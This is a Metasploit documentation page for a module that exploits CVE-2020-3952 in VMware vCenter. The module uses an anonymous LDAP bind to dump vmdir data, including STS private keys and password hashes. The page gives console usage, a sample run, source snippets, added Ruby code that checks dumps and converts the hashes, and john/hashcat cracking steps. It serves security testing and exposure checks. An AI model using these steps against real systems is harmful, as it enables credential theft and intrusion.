VMware vCenter Server vmdir Information Disclosure - Metasploit


This page contains detailed information about how to use the auxiliary/gather/vmware_vcenter_vmdir_ldap Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: VMware vCenter Server vmdir Information Disclosure
Module: auxiliary/gather/vmware_vcenter_vmdir_ldap
Source code: modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
Disclosure date: 2020-04-09
Last modification time: 2022-10-13 10:13:27 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 636
List of CVEs: CVE-2020-3952

This module uses an anonymous-bind LDAP connection to dump data from the vmdir service in VMware vCenter Server version 6.7 prior to the 6.7U3f update, only if upgraded from a previous release line, such as 6.0 or 6.5.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


msf > use auxiliary/gather/vmware_vcenter_vmdir_ldap
msf auxiliary(vmware_vcenter_vmdir_ldap) > show actions
    ... a list of actions (this module has a single action, Dump) ...
msf auxiliary(vmware_vcenter_vmdir_ldap) > set ACTION Dump
msf auxiliary(vmware_vcenter_vmdir_ldap) > show options
    ... show and set options ...
msf auxiliary(vmware_vcenter_vmdir_ldap) > run

Auxiliary modules have actions rather than targets, so there is no TARGET to set; `exploit` is accepted as an alias for `run`.

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Description

This module uses an anonymous-bind LDAP connection to dump data from the vmdir service in VMware vCenter Server version 6.7 prior to the 6.7U3f update, only if upgraded from a previous release line, such as 6.0 or 6.5.

Setup

Tested in the wild. No setup notes are available at this time, as setup is specific to the target environment.

Verification Steps


Follow Setup and Scenarios.

Actions


Dump

Dump all LDAP data from the vCenter Server.

Options


BASE_DN

If you already have the LDAP base DN, you may set it in this option.

Scenarios


VMware vCenter Server 6.7 virtual appliance on ESXi

msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options

Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   BASE_DN                   no        LDAP base DN if you already have it
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    636              yes       The target port
   SSL      true             no        Enable SSL on the LDAP connection


Auxiliary action:

   Name  Description
   ----  -----------
   Dump  Dump all LDAP data


msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
rhosts => [redacted]
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
[*] Running module against [redacted]
not verifying SSL hostname of LDAPS server '[redacted]:636'

[*] Discovering base DN automatically
[*] Searching root DSE for base DN
dn: cn=DSE Root
namingcontexts: dc=vsphere,dc=local
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
supportedcontrol: 1.2.840.113556.1.4.417
supportedcontrol: 1.2.840.113556.1.4.319
supportedldapversion: 3
supportedsaslmechanisms: GSSAPI

[+] Discovered base DN: dc=vsphere,dc=local
[*] Dumping LDAP data from vmdir service at [redacted]:636
[+] [redacted]:636 is vulnerable to CVE-2020-3952
[*] Storing LDAP data in loot
[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002613_default_[redacted]_VMwarevCenterS_939568.txt
[*] Password and lockout policy:
vmwpasswordchangeautounlockintervalsec: [redacted]
vmwpasswordchangefailedattemptintervalsec: [redacted]
vmwpasswordchangemaxfailedattempts: [redacted]
vmwpasswordlifetimedays: [redacted]
vmwpasswordmaxidenticaladjacentchars: [redacted]
vmwpasswordmaxlength: [redacted]
vmwpasswordminalphabeticcount: [redacted]
vmwpasswordminlength: [redacted]
vmwpasswordminlowercasecount: [redacted]
vmwpasswordminnumericcount: [redacted]
vmwpasswordminspecialcharcount: [redacted]
vmwpasswordminuppercasecount: [redacted]
vmwpasswordprohibitedpreviouscount: [redacted]

[+] Credentials found: [redacted]
[snip]
[*] Auxiliary module execution completed
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) >


Msfconsole Usage


Here is how the gather/vmware_vcenter_vmdir_ldap auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/vmware_vcenter_vmdir_ldap

msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show info

       Name: VMware vCenter Server vmdir Information Disclosure
     Module: auxiliary/gather/vmware_vcenter_vmdir_ldap
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-04-09

Provided by:
  Hynek Petrak
  wvu <[email protected]>

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Available actions:
  Name  Description
  ----  -----------
  Dump  Dump all LDAP data

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  BASE_DN                   no        LDAP base DN if you already have it
  BIND_DN                   no        The username to authenticate to LDAP server
  BIND_PW                   no        Password for the BIND_DN
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    636              yes       The target port
  SSL      true             no        Enable SSL on the LDAP connection

Description:
  This module uses an anonymous-bind LDAP connection to dump data from 
  the vmdir service in VMware vCenter Server version 6.7 prior to the 
  6.7U3f update, only if upgraded from a previous release line, such 
  as 6.0 or 6.5.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-3952
  https://www.vmware.com/security/advisories/VMSA-2020-0006.html

Module Options


This is a complete list of options available in the gather/vmware_vcenter_vmdir_ldap auxiliary module:

msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show options

Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   BASE_DN                   no        LDAP base DN if you already have it
   BIND_DN                   no        The username to authenticate to LDAP server
   BIND_PW                   no        Password for the BIND_DN
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    636              yes       The target port
   SSL      true             no        Enable SSL on the LDAP connection

Auxiliary action:

   Name  Description
   ----  -----------
   Dump  Dump all LDAP data

Advanced Options


Here is a complete list of advanced options supported by the gather/vmware_vcenter_vmdir_ldap auxiliary module:

msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show advanced

Module advanced options (auxiliary/gather/vmware_vcenter_vmdir_ldap):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   LDAP::ConnectTimeout  10.0             yes       Timeout for LDAP connect
   VERBOSE               false            no        Enable detailed status messages
   WORKSPACE                              no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/vmware_vcenter_vmdir_ldap module can do:

msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   Dump  Dump all LDAP data

Evasion Options


Here is the full list of possible evasion options supported by the gather/vmware_vcenter_vmdir_ldap auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Falling back on default base DN dc=vsphere,dc=local


Here is a relevant code snippet related to the "Falling back on default base DN dc=vsphere,dc=local" error message:

74:	        print_status("User-specified base DN: #{base_dn}")
75:	      else
76:	        print_status('Discovering base DN automatically')
77:	
78:	        unless (@base_dn = discover_base_dn(ldap))
79:	          print_warning('Falling back on default base DN dc=vsphere,dc=local')
80:	        end
81:	      end
82:	
83:	      print_status("Dumping LDAP data from vmdir service at #{peer}")
84:	

<PEER> is NOT vulnerable to CVE-2020-3952


Here is a relevant code snippet related to the "<PEER> is NOT vulnerable to CVE-2020-3952" error message:

87:	      entries = ldap.search(base: base_dn, attributes: %w[* + -])
88:	    end
89:	
90:	    # Look for an entry with a non-empty vmwSTSPrivateKey attribute
91:	    unless entries&.find { |entry| entry[:vmwstsprivatekey].any? }
92:	      print_error("#{peer} is NOT vulnerable to CVE-2020-3952")
93:	      return Exploit::CheckCode::Safe
94:	    end
95:	
96:	    print_good("#{peer} is vulnerable to CVE-2020-3952")
97:	    pillage(entries)
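
The check in the snippet above (an entry whose vmwSTSPrivateKey is readable through the anonymous bind) and the base DN discovery shown in the Scenarios section can both be reproduced offline against LDIF text, for example the dump the module saves to loot. The following Ruby is an added example, not code from the module or from Metasploit: it parses LDIF (including `::` base64 values and folded continuation lines), takes the base DN from the root DSE's namingcontexts with the module's `dc=vsphere,dc=local` fallback, and reports every entry carrying a non-empty vmwSTSPrivateKey. The root DSE text, the dump excerpt, the tenant-credential DN and the key value are all constructed placeholders.

```ruby
# Added example (not module code): reproduce the module's base DN discovery
# and its CVE-2020-3952 indicator check offline, against LDIF text such as the
# root DSE it prints and the dump it stores in loot.

# Constructed root DSE, shaped like the one the module prints during discovery.
ROOT_DSE_LDIF = <<~LDIF
  dn: cn=DSE Root
  namingcontexts: dc=vsphere,dc=local
  supportedldapversion: 3
  supportedsaslmechanisms: GSSAPI
LDIF

# Constructed dump excerpt. The tenant-credential DN is a hypothetical
# placeholder and the base64 value is NOT a real key, only filler so that the
# attribute is non-empty; it is folded over two lines as a real dump would be.
FAKE_KEY = ['PLACEHOLDER-NOT-A-REAL-STS-PRIVATE-KEY'].pack('m0')
DUMP_LDIF = <<~LDIF
  dn: cn=Users,dc=vsphere,dc=local
  objectclass: container
  cn: Users

  dn: cn=TenantCredential-1,cn=Tenants,cn=IdentityManager,cn=Services,dc=vsphere,dc=local
  objectclass: vmwSTSTenantCredential
  cn: TenantCredential-1
  vmwSTSPrivateKey:: #{FAKE_KEY[0, 20]}
   #{FAKE_KEY[20..]}
LDIF

# Unfold LDIF continuation lines (a leading space joins onto the previous
# line) and drop comment lines.
def unfold_ldif(text)
  lines = []
  text.each_line(chomp: true) do |line|
    next if line.start_with?('#')
    if line.start_with?(' ') && !lines.empty?
      lines[-1] += line[1..]
    else
      lines << line
    end
  end
  lines
end

# Parse LDIF into [{ dn: String, attrs: { 'lowercased-name' => [values] } }].
# "name:: value" is base64 (binary attributes such as vmwSTSPrivateKey and
# userPassword arrive this way); "name: value" is literal.
def parse_ldif(text)
  entries = []
  current = nil
  unfold_ldif(text).each do |line|
    if line.empty?
      entries << current if current
      current = nil
      next
    end
    name, sep, value = line.partition(/::? /)
    next if sep.empty? # not an attribute line
    value = value.unpack1('m') if sep == ':: '
    if name.casecmp?('dn')
      entries << current if current
      current = { dn: value, attrs: {} }
    elsif current
      (current[:attrs][name.downcase] ||= []) << value
    end
  end
  entries << current if current
  entries
end

# Base DN the way the module finds it: namingcontexts from the root DSE,
# otherwise the module's hard-coded fallback.
def discover_base_dn(root_dse_ldif)
  root = parse_ldif(root_dse_ldif).first
  (root && root[:attrs].fetch('namingcontexts', []).first) || 'dc=vsphere,dc=local'
end

# The module's indicator: any entry with a non-empty vmwSTSPrivateKey value
# that the anonymous bind could read means the vmdir ACLs still allow the leak.
def leaked_sts_keys(entries)
  entries.select { |e| e[:attrs].fetch('vmwstsprivatekey', []).any? { |v| !v.empty? } }
end

def check_dump(root_dse_ldif, dump_ldif)
  hits = leaked_sts_keys(parse_ldif(dump_ldif))
  { base_dn: discover_base_dn(root_dse_ldif),
    vulnerable: !hits.empty?,
    leaked_dns: hits.map { |e| e[:dn] } }
end

if __FILE__ == $PROGRAM_NAME
  r = check_dump(ROOT_DSE_LDIF, DUMP_LDIF)
  puts "Base DN: #{r[:base_dn]}"
  puts(r[:vulnerable] ? 'vulnerable to CVE-2020-3952 (vmwSTSPrivateKey readable)' : 'NOT vulnerable')
  r[:leaked_dns].each { |dn| puts "  #{dn}" }
end
```

Point `check_dump` at the loot file from a real run (read it with `File.read`) to confirm which entries exposed key material; a dump with no non-empty vmwSTSPrivateKey is exactly the condition under which the module prints "is NOT vulnerable to CVE-2020-3952".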

Could not store LDAP data in loot


Here is a relevant code snippet related to the "Could not store LDAP data in loot" error message:

117:	      nil, # filename
118:	      "Base DN: #{base_dn}" # info
119:	    )
120:	
121:	    unless ldif_filename
122:	      print_error('Could not store LDAP data in loot')
123:	      return
124:	    end
125:	
126:	    print_good("Saved LDAP data to #{ldif_filename}")
127:	

No password hashes found


Here is a relevant code snippet related to the "No password hashes found" error message:

134:	    process_hashes(entries.select { |entry| entry[:userpassword].any? })
135:	  end
136:	
137:	  def process_hashes(entries)
138:	    if entries.empty?
139:	      print_status('No password hashes found')
140:	      return
141:	    end
142:	
143:	    service_details = {
144:	      workspace_id: myworkspace_id,

Type <TYPE> hash length is not 128 digits (<DN>)


Here is a relevant code snippet related to the "Type <TYPE> hash length is not 128 digits (<DN>)" error message:

158:	      type, hash, salt = entry[:userpassword].first.unpack('CH128H32')
159:	
160:	      case type
161:	      when 1
162:	        unless hash.length == 128
163:	          vprint_error("Type #{type} hash length is not 128 digits (#{dn})")
164:	          next
165:	        end
166:	
167:	        unless salt.length == 32
168:	          vprint_error("Type #{type} salt length is not 32 digits (#{dn})")

Type <TYPE> salt length is not 32 digits (<DN>)


Here is a relevant code snippet related to the "Type <TYPE> salt length is not 32 digits (<DN>)" error message:

163:	          vprint_error("Type #{type} hash length is not 128 digits (#{dn})")
164:	          next
165:	        end
166:	
167:	        unless salt.length == 32
168:	          vprint_error("Type #{type} salt length is not 32 digits (#{dn})")
169:	          next
170:	        end
171:	
172:	        # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
173:	        john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"

Hash type <TYPE.INSPECT> is not supported yet (<DN>)


Here is a relevant code snippet related to the "Hash type <TYPE.INSPECT> is not supported yet (<DN>)" error message:

170:	        end
171:	
172:	        # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
173:	        john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"
174:	      else
175:	        vprint_error("Hash type #{type.inspect} is not supported yet (#{dn})")
176:	        next
177:	      end
178:	
179:	      print_good("Credentials found: #{dn}:#{john_hash}")
180:	
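
The three messages above all come from the module's parsing of vmdir's userPassword attribute: one type byte, 64 bytes of SHA-512 digest and 16 bytes of salt, which it emits as a John the Ripper dynamic_82 line. The Ruby below is an added example, not the module's code: it builds a blob of that layout from a known password, converts it the way the module does, rejects truncated or unknown-type blobs with the same reasons, and verifies a candidate password against the resulting line offline. The SHA-512(password || salt) ordering is an assumption taken from the module's choice of dynamic_82, which John's DYNAMIC doc defines as sha512($p.$s); the password, salt and DN in the example are constructed.

```ruby
require 'digest'
require 'securerandom'

# Added example (not module code). vmdir userPassword layout as the module
# unpacks it ('CH128H32'): one type byte, 64 bytes of SHA-512 digest, 16 bytes
# of salt, 81 bytes in total.
TYPE_SALTED_SHA512 = 1

# Build a blob of that layout from a known password so the parser below can be
# exercised offline. ASSUMPTION: digest = SHA-512(password || salt), which is
# what John's dynamic_82 (sha512($p.$s)), the format the module emits, means.
def build_userpassword(password, salt = SecureRandom.random_bytes(16))
  raise ArgumentError, 'salt must be 16 bytes' unless salt.bytesize == 16
  [TYPE_SALTED_SHA512].pack('C') + Digest::SHA512.digest(password.b + salt) + salt
end

# Same parsing and sanity checks as the module; returns [john_line, nil], or
# [nil, reason] for blobs the module skips with a vprint_error.
def to_john(blob)
  type, hash, salt = blob.unpack('CH128H32')
  return [nil, "hash type #{type.inspect} is not supported"] unless type == TYPE_SALTED_SHA512
  return [nil, 'hash length is not 128 digits'] unless hash.length == 128
  return [nil, 'salt length is not 32 digits'] unless salt.length == 32
  ["$dynamic_82$#{hash}$HEX$#{salt}", nil]
end

# Offline check of one candidate against a dynamic_82 line, comparing the
# digests in constant time.
def verify_candidate(john_line, candidate)
  m = john_line.match(/\A\$dynamic_82\$(\h{128})\$HEX\$(\h{32})\z/)
  return false unless m
  expected = [m[1]].pack('H*')
  actual = Digest::SHA512.digest(candidate.b + [m[2]].pack('H*'))
  expected.bytes.zip(actual.bytes).reduce(0) { |acc, (a, b)| acc | (a ^ b) }.zero?
end

if __FILE__ == $PROGRAM_NAME
  blob = build_userpassword('Passw0rd!')       # constructed password, random salt
  john, reason = to_john(blob)
  abort("skipped: #{reason}") if reason
  puts "cn=example,dc=vsphere,dc=local:#{john}" # placeholder DN, module prints dn:hash
  puts "candidate 'Passw0rd!' matches: #{verify_candidate(john, 'Passw0rd!')}"
end
```

The module prints these lines as `<dn>:<john_hash>`; strip the DN prefix before running `john --format=dynamic_82`, or, for hashcat, use mode 1710 (sha512($pass.$salt)) with `--hex-salt` and a `<hash>:<salt>` line.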

Authors


  • Hynek Petrak
  • wvu

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
